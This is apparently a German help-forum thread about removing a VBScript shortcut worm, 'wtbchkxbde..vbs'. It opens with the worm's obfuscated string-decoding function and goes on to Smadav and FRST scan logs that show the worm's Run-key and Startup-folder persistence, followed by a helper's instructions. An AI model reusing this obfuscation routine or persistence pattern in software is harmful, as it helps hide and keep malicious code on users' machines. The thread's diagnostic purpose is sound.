Function FOFwEQObHcOMduGpSoigGYvXJZNxDE(FOFwEQObHcOMduGpSoigGYvXJZNxD, FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
Rnd(-1)
Randomize FOFwEQObHcOMduGpSoigGYvXJZNx
FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq =  Int( ( Len(FOFwEQObHcOMduGpSoigGYvXJZN) - 1 + 1 ) * Rnd + 1 )
FOFwEQObHcOMduGpS = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZNxD)
FOFwEQObHcOMduGpSo = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZN)
For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to UBound( FOFwEQObHcOMduGpS ) - 1
FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq
If FOFwEQObHcOMduGpSoi > UBound(FOFwEQObHcOMduGpSo) Then
Dim FOFwEQObHcOMdu
FOFwEQObHcOMdu = Int(FOFwEQObHcOMduGpSoi / (UBound(FOFwEQObHcOMduGpSo) + 1))
Dim FOFwEQObHcOMd
FOFwEQObHcOMd = ((UBound(FOFwEQObHcOMduGpSo) + 1 ))
FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoi - FOFwEQObHcOMd * FOFwEQObHcOMdu
End If
FOFwEQObHcOMduGp = FOFwEQObHcOMduGpS(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO) - FOFwEQObHcOMduGpSo(FOFwEQObHcOMduGpSoi)
If FOFwEQObHcOMduGp < 0 Then
FOFwEQObHcOMduGp = FOFwEQObHcOMduGp + 256
End If
dim FOFwEQObHcOM
FOFwEQObHcOM = Chr(FOFwEQObHcOMduGp)
FOFwEQObHcOMduG = FOFwEQObHcOMduG & FOFwEQObHcOM
NEXT
FOFwEQObHcOMduGpSoigGYvXJZNxDE = FOFwEQObHcOMduG
End Function
         
Mein Avira (zuletzt aktualisiert am 14.3.14) erkennt keinen Virus.
Habe mir einen anderen Antivirus organisiert (Smadv, Version vom 22.1.14).
Dieser erkennt den Virus und findet die .vbs auch unter "C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", nach dem Entfernen durch den Antivirus kommt die .vbs aber sofort wieder.

Folgendes Log wurde erstellt:
Code:
ATTFilter
==============================
Log File of Smadav 2014 Rev. 9.6
==============================

Scanning Results :
=> Time & Date : 11:12:39, on 04-09-2014
=> Finishing Time : 36 minutes,17 seconds
=> Folder Scanned :31530
=> File Scanned : 204327
=> File Detected : 2
=> File Cleaned : 0
=> File Skipped : 0
=> Value Scanned : 1234
=> Value Detected: 0
=> Value Fixed: 0
=> Path Scanned: 0
=> Path Hidden: 0
=> Path Unhidden: 0

==============================
Before Scanning
==============================
Suspected Paths :
=> Fine(Level 2) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> Fine(Level 2) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> Fine(Level 2) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process
   -C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\Launch Manager\LManager.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Launch Manager\LMworker.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\iTunes\iTunes.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> Fine(Level 1) as  : 1 Process
   -C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Program Files\NetLimiter 3\NLClientApp.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> Fine(Level 1) as  : 1 Startup
   -C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe

Running Processes :
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wininit.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> N/A
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
=> N/A
=> C:\Windows\explorer.exe
=> N/A
=> C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> N/A
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wscript.exe
=> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> C:\Program Files (x86)\Launch Manager\LManager.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> C:\Program Files (x86)\Launch Manager\LMworker.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Program Files (x86)\iTunes\iTunes.exe
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\SearchIndexer.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> N/A
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> N/A
=> N/A
=> N/A
=> C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe
=> C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> N/A

==============================
After Scanning
==============================
Suspected Paths :
=> Unknown(Level 3) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> Unknown(Level 3) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> Unknown(Level 3) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
=> Unknown(Level 3) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process
   -C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\Launch Manager\LManager.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> Fine(Level 1) as  : 1 Process, 1 Startup
   -C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Launch Manager\LMworker.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\iTunes\iTunes.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> Fine(Level 1) as  : 1 Process
   -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> Fine(Level 1) as  : 1 Process
   -C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Program Files\NetLimiter 3\NLClientApp.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
=> Fine(Level 1) as  : 1 Startup
   -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> Fine(Level 1) as  : 1 Startup
   -C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe

Running Processes :
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wininit.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> N/A
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
=> N/A
=> C:\Windows\explorer.exe
=> N/A
=> C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> N/A
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wscript.exe
=> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> C:\Program Files (x86)\Launch Manager\LManager.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> C:\Program Files (x86)\Launch Manager\LMworker.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Program Files (x86)\iTunes\iTunes.exe
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\SearchIndexer.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> N/A
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> N/A
=> N/A
=> N/A
=> C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe
=> C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> N/A
=> C:\Windows\System32\SearchProtocolHost.exe
=> C:\Windows\System32\SearchFilterHost.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
=> N/A
=> N/A

Detected Virus :
=> VBS.Encrypted.B
   -Infected File
   -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> New Heur.FFD(VBS)
   -Infected File
   -E:\wtbchkxbde..vbs
         
weiterhin auffällig:
Mein Laptop hängt sich seit dem Virusbefall ohne Belastung (Word oder Spidersolitär) manchmal auf (bis jetzt 4 mal seit einer Woche)
Seit ich smadav benutzt habe sind meine Desktopsymbole schmaler und näher nebeneinander (Höhe ist normal). Keine Ahnung ob das mit dem Virus zu tun hat, falls jemand zufällig eine Lösung dafür hat wäre das sehr nett.

Ich komme nur sehr unregelmäßig online, versuche aber etwaige Fragen schnell zu beantworten

Hier im Dorf ist der Virus anscheinend auf jedem PC, ein ganzer Stamm wird euch also dankbar sein für jegliche Hilfe

Viele Grüße aus dem Dschungel
Franz

Alt 13.04.2014, 14:13   #2
schrauber
/// the machine
/// TB-Ausbilder
 

Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



hi,

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

__________________

__________________

Alt 14.04.2014, 10:56   #3
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Danke für die schnelle Antwort!

FRST.txt:

FRST Logfile:

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 14-04-2014 10:43:32
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal



==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Windows\system32\igfxtray.exe
(Intel Corporation) C:\Windows\system32\hkcmd.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
